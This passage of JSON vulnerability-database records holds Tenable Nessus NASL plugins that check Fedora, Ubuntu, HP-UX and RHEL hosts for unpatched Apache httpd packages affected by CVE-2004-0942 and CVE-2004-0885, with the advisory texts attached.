"p-cpe:/a:fedoraproject:fedora:mod_ssl"], "id": "FEDORA_2004-421.NASL", "href": "https://www.tenable.com/plugins/nessus/15735", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-421.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15735);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2004-421\");\n\n script_name(english:\"Fedora Core 3 : httpd-2.0.52-3.1 (2004-421)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the fix for a memory consumption denial of\nservice issue in the handling of request header lines (CVE-2004-0942).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-November/000395.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c32c47d3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"httpd-2.0.52-3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"httpd-debuginfo-2.0.52-3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"httpd-devel-2.0.52-3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"httpd-manual-2.0.52-3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"httpd-suexec-2.0.52-3.1\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"mod_ssl-2.0.52-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-suexec / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T15:27:38", "description": "Chintan Trivedi discovered a Denial of Service vulnerability in\napache2. The field length limit was not enforced for certain malicious\nrequests. This could allow a remote attacker who is able to send large\namounts of data to a server to cause HTTP server instances to consume\nproportional amounts of memory, which can render the service\nunavailable.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 : apache2 vulnerability (USN-23-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "modified": "2006-01-15T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild", "p-cpe:/a:canonical:ubuntu_linux:libapr0", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork", "p-cpe:/a:canonical:ubuntu_linux:libapr0-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-threadpool", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker", "p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-doc", "p-cpe:/a:canonical:ubuntu_linux:apache2-common"], "id": "UBUNTU_USN-23-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20638", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-23-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20638);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2004-0942\");\n script_xref(name:\"USN\", value:\"23-1\");\n\n script_name(english:\"Ubuntu 4.10 : apache2 vulnerability (USN-23-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chintan Trivedi discovered a Denial of Service vulnerability in\napache2. The field length limit was not enforced for certain malicious\nrequests. This could allow a remote attacker who is able to send large\namounts of data to a server to cause HTTP server instances to consume\nproportional amounts of memory, which can render the service\nunavailable.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-threadpool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2004-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-common\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-doc\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-mpm-threadpool\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libapr0\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libapr0-dev\", pkgver:\"2.0.50-12ubuntu4.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-common / apache2-doc / apache2-mpm-perchild / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T11:32:13", "description": "s700_800 11.04 Virtualvault 4.7 OWS (Apache 2.x) update : \n\nA potential security vulnerability has been identified with Apache\nrunning on HP-UX where the vulnerability could be exploited remotely\nto create a Denial of Service (DoS) or to bypass SSLCipherSuite\nrestrictions.", "edition": 23, "published": "2005-08-08T00:00:00", "title": "HP-UX PHSS_33075 : Apache on HP-UX, Remote Denial of Service (DoS), Bypass of SSLCipherSuite Settings (HPSBUX01123 SSRT5931 rev.2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0942"], "modified": "2005-08-08T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_33075.NASL", "href": "https://www.tenable.com/plugins/nessus/19399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_33075. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19399);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0885\", \"CVE-2004-0942\");\n script_xref(name:\"HP\", value:\"emr_na-c01035700\");\n script_xref(name:\"HP\", value:\"HPSBUX01123\");\n script_xref(name:\"HP\", value:\"SSRT5931\");\n\n script_name(english:\"HP-UX PHSS_33075 : Apache on HP-UX, Remote Denial of Service (DoS), Bypass of SSLCipherSuite Settings (HPSBUX01123 SSRT5931 rev.2)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.7 OWS (Apache 2.x) update : \n\nA potential security vulnerability has been identified with Apache\nrunning on HP-UX where the vulnerability could be exploited remotely\nto create a Denial of Service (DoS) or to bypass SSLCipherSuite\nrestrictions.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01035700\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?557bcbd2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_33075 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_33075 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_33075\", \"PHSS_34123\", \"PHSS_34932\", \"PHSS_35436\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultDOC.VV-HTML-MAN\", version:\"A.04.70\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-GUI\", version:\"A.04.70\")) flag++;\nif (hpux_check_patch(app:\"VaultWS.WS-CORE\", version:\"A.04.70\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:44", "description": " - Thu Nov 11 2004 Joe Orton <jorton at redhat.com>\n 2.0.51-2.9\n\n - add fix for memory consumption DoS, CVE-2004-0942\n\n - mod_ssl: add fix for SSLCipherSuite bypass,\n CVE-2004-0885\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2004-11-17T00:00:00", "title": "Fedora Core 2 : httpd-2.0.51-2.9 (2004-420)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0942"], "modified": "2004-11-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:2", "p-cpe:/a:fedoraproject:fedora:httpd", "p-cpe:/a:fedoraproject:fedora:httpd-devel", "p-cpe:/a:fedoraproject:fedora:httpd-manual", "p-cpe:/a:fedoraproject:fedora:httpd-debuginfo", "p-cpe:/a:fedoraproject:fedora:mod_ssl"], "id": "FEDORA_2004-420.NASL", "href": "https://www.tenable.com/plugins/nessus/15734", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-420.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15734);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2004-420\");\n\n script_name(english:\"Fedora Core 2 : httpd-2.0.51-2.9 (2004-420)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Thu Nov 11 2004 Joe Orton <jorton at redhat.com>\n 2.0.51-2.9\n\n - add fix for memory consumption DoS, CVE-2004-0942\n\n - mod_ssl: add fix for SSLCipherSuite bypass,\n CVE-2004-0885\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-November/000394.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1b93bf8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"httpd-2.0.51-2.9\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"httpd-debuginfo-2.0.51-2.9\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"httpd-devel-2.0.51-2.9\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"httpd-manual-2.0.51-2.9\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"mod_ssl-2.0.51-2.9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:20", "description": "Updated httpd packages that include fixes for two security issues, as\nwell as other bugs, are now available.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nAn issue has been discovered in the mod_ssl module when configured to\nuse the 'SSLCipherSuite' directive in directory or location context.\nIf a particular location context has been configured to require a\nspecific set of cipher suites, then a client will be able to access\nthat location using any cipher suite allowed by the virtual host\nconfiguration. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0885 to this issue.\n\nAn issue has been discovered in the handling of white space in request\nheader lines using MIME folding. A malicious client could send a\ncarefully crafted request, forcing the server to consume large amounts\nof memory, leading to a denial of service. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name\nCVE-2004-0942 to this issue.\n\nSeveral minor bugs were also discovered, including :\n\n - In the mod_cgi module, problems that arise when CGI\n scripts are invoked from SSI pages by mod_include using\n the '#include virtual' syntax have been fixed.\n\n - In the mod_dav_fs module, problems with the handling of\n indirect locks on the S/390x platform have been fixed.\n\nUsers of the Apache HTTP server who are affected by these issues\nshould upgrade to these updated packages, which contain backported\npatches.", "edition": 28, "published": "2004-11-13T00:00:00", "title": "RHEL 3 : httpd (RHSA-2004:562)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1834", "CVE-2004-0885", "CVE-2004-0942"], "modified": "2004-11-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2004-562.NASL", "href": "https://www.tenable.com/plugins/nessus/15700", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:562. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15700);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0885\", \"CVE-2004-0942\", \"CVE-2004-1834\");\n script_xref(name:\"RHSA\", value:\"2004:562\");\n\n script_name(english:\"RHEL 3 : httpd (RHSA-2004:562)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that include fixes for two security issues, as\nwell as other bugs, are now available.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nAn issue has been discovered in the mod_ssl module when configured to\nuse the 'SSLCipherSuite' directive in directory or location context.\nIf a particular location context has been configured to require a\nspecific set of cipher suites, then a client will be able to access\nthat location using any cipher suite allowed by the virtual host\nconfiguration. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0885 to this issue.\n\nAn issue has been discovered in the handling of white space in request\nheader lines using MIME folding. A malicious client could send a\ncarefully crafted request, forcing the server to consume large amounts\nof memory, leading to a denial of service. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name\nCVE-2004-0942 to this issue.\n\nSeveral minor bugs were also discovered, including :\n\n - In the mod_cgi module, problems that arise when CGI\n scripts are invoked from SSI pages by mod_include using\n the '#include virtual' syntax have been fixed.\n\n - In the mod_dav_fs module, problems with the handling of\n indirect locks on the S/390x platform have been fixed.\n\nUsers of the Apache HTTP server who are affected by these issues\nshould upgrade to these updated packages, which contain backported\npatches.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0942\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-1834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apacheweek.com/features/security-20\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:562\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd, httpd-devel and / or mod_ssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red 